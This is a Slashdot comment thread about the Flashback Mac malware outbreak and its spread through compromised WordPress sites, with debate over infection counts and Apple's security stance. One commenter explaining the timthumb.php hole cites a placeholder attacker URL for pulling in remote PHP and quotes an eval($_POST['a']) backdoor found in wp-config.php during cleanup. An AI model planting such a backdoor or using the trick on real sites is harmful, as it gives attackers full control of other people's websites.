Mac Flashback Attack Began With Wordpress Blogs 103
With more on the Flashback malware plaguing many Macs, beaverdownunder writes with some explanation of how the infection grew so quickly: "Alexander Gostev, head of the global research and analysis team at Kaspersky, says that 'tens of thousands of sites powered by WordPress were compromised. How this happened is unclear. The main theories are that bloggers were using a vulnerable version of WordPress or they had installed the ToolsPack plug-in.'"
Re:In the end, it's better that it happened (Score:5, Informative)
As I understand it, Mac's installed base is roughly ~8%, windows about ~85% (obviously, accurate and unbiased statistics are pretty near impossible to find).
Flashback infected some ~600,000 macs, so a PC trojan would have to have hit ~ 6,375,000 PC's in order to be worse.
Conficker (http://en.wikipedia.org/wiki/Conficker) infected ~7 million PC's, which is somewhat worse, but not by a large margin.
Obviously Flashback had the benefit of fighting against a userbase largely ignorant of security and it's quite likely that if Apple and it's users start taking security seriously, future Mac infections will have significantly less impact. But history tells me things will become much worse before it gets better.
Re:In the end, it's better that it happened (Score:5, Informative)
Where did you hear this? At the cooler in Redmond?
From the numbers it doesn't seem like an unlikely claim actually (single virus compromising percentage of installed base), though a citation would be nice so it made me check (source for numbers below [daringfireball.net]):
The Mach Flashback virus compromised around 600.000 Macs, which is around 1% of installed base.
The single largest Windows-based infection ever was Conficker. At its peak in 2009, it infected about 0.7% of the total Windows installed base.
Re:Ignorance (Score:5, Informative)
The malware still has to install on the user's OS, which requires browser/plugin exploits on the user's PC for user-privilege level access and possibly a local escalation bug if the malware wants admin rights without user "approval". So I think it's fair to cast _some_ aspersion at Apple here, even if WordPress is providing the server end of the malware deployment ecosystem.
But getting back to your point about WordPress. It seems to me that WordPress has been the server-side vector for far too many malware deployment efforts. I've certainly heard its name associated with a lot of previous malware storms. What are some more secure alternatives to WordPress?
Re:Ignorance (Score:3, Informative)
Re:Walled Garden (Score:4, Informative)
For this you'll need Apple to back pedal on some simplification they've made to make their OS more accessible to less technical people. (Like installing application simply by drag-droping an icon from an archive into a system folder. With no privilege asked).
There's no simplification there. It's standard Unix permissions. The normal Application folder is shared between users for read and execute, but you need admin privileges to write there. So only admins can install there. A user can set up their own private Applications folder if they want and install applications there though.
Neither Applications folder is a system folder.
This ability to do drag and drop installs has precisely nothing to do with vulnerability to malware.
You'd do better to restrict predictions of the future to things you know something about.
Re:In the end, it's better that it happened (Score:5, Informative)
At it's height it was never as bad as some of the windows viruses have been
Mac Malware Outbreak Is Bigger than 'Conficker' [pcworld.com]. Remember that OS X only has about 5% of global desktop market, 0.6 million desktops may not sound like much in comparison to Windows, but as a share of the Mac total it is significant: "Mac OS X is the number two desktop OS with 6.54 percent market share. Windows, on the other hand, accounts for 92.48 percent of the market. Based on market share, the Flashback Trojan botnet is equivalent to a Windows botnet of nearly 8.5 million PCs. That makes it an even larger threat than Conficker--just on a much smaller platform."
It's not true. It climbed to 600.000 infections, according to Kaspersky (anti-virus developper) and dropped to 30.000.
They got it wrong; Symantec and Kaspersky both said the number had fallen, but Symantec have admitted they were wrong, and Kaspersky are now "looking into the matter". Flashback botnet not shrinking, huge numbers of Macs still infected: [computerworld.com]
"We've been talking with them about the discrepancies in our numbers and theirs," said O Murchu in an interview Friday. "We now believe that their analysis is accurate, and that it explains the discrepancies."
"This server communicates with bots but doesn't close a TCP connection," wrote Dr. Web. "As [a] result, bots switch to the stand-by mode and wait for the server's reply and no longer respond to further commands. As a consequence, they do not communicate with other command centers, many of which have been registered by information security specialists [including Kaspersky and Symantec]. "This is the cause of controversial statistics," said Dr. Web.
Also see Antivirus Researchers Confirm: Flashback Still Infects More Than 500,000 Macs [forbes.com].
Wordpress wasn't that vulnerable, timthumb was. (Score:5, Informative)
"How this happened is unclear. The main theories are that bloggers were using a vulnerable version of WordPress or they had installed the ToolsPack plug-in."
This it not unclear at all. There were a few security problems with WP in the last year. But a LOT of themes use the timthumb.php module to do dynamic rescaling of images. Timthumb used to be extremely vulnerable, you could download a file from http://www.youtube.com.attacker-domainname/anything.php, install it in the timthumb's cache and have full access like forever.
Updating WP wouldn't do any good, as a fully updated WP installation can still run a vulnerable theme. Even when the flaws in timthumb were fixed and the theme is updated, these sites have been flooded with backdoors, varying from eval($_POST['a']) in wp-config.php to newly created admin users. (Admin users can edit .php files from /wp-admin, an admin user effectively has power to run any php code desired.)
I've manually removed and analysed infections from several customers wordpress websites, all were hit by timthumb exploits. Some of these websites had literally dozens of backdoors, each of which gave full access to the site. I've seen malware that hid from googlebot to avoid detection. I've seen infections with timers, and infections that kept an IRC connection open to accept commands. These infections were just waiting for the right moment to be abused.
Not really a surprise (Score:5, Informative)
Apple really wants to downplay the issue. This actually isn't the first Malware to hit Macs (one of our professors got one that was using text to speech to read out ads, it was hilarious) just the first one to be really bad. Apple is still addicted to selling the viewpoint that Macs are immune to that kind of shit. So they didn't go putting out any big press releases warning people of nasty shit.
Most of the time when there's a nasty problem, the vendors put out press releases to try and let people know that the patches this time around are more important than normal and yes, you really need to apply them Right Now. Apple didn't so reporting on it wasn't as widespread as you might expect.
Also there are a surprising number of Mac users who drink the "Macs can't get viruses," kool aid whole heartedly. They don't just believe the specifics of the Apple advertising, they really believe Macs are 100% immune to security issues. Drives me up the wall when I'm dealing with one of them and trying to explain that yes, you DO need to patch your OS even though it is a Mac and no, running an FTP with world write access is not ok just because it is a Mac (really, had some grad students pull that one).
Given the amount of Mac users in journalism, and the general techno-unawareness of journalists, that makes the problem worse. Someone sees a story about a "mac virus" and they say "Nah, can't be real, Mac's don't get viruses, just more stupid shit floating around the 'net."
As time goes on, and Macs continue to be targeted (which they will) or we see cross platform attacks (using Java or HTML5 or something) the awareness of security on Macs will slowly rise.
Re:In the end, it's better that it happened (Score:5, Informative)
I say make it worse next time! And, target all OS's!
The Java exploit used to spread Mac Flashback wasn't Mac specific, it just went unpatched for several months longer on OS X than on Windows. All the while almost all Mac users surfed the internet with a false sense of impunity.
I don't think any researchers have tried to figure out how many PC's were affected by the same Java exploit, but the impact this has had on the Mac user mindset - and Apple's security responses - should be rather sobering.
Re:In the end, it's better that it happened (Score:4, Informative)
...according to Kaspersky (anti-virus developper) and dropped to 30.000.
The drop to 30,000 has been discredited. The number is still, unfortunately, much higher.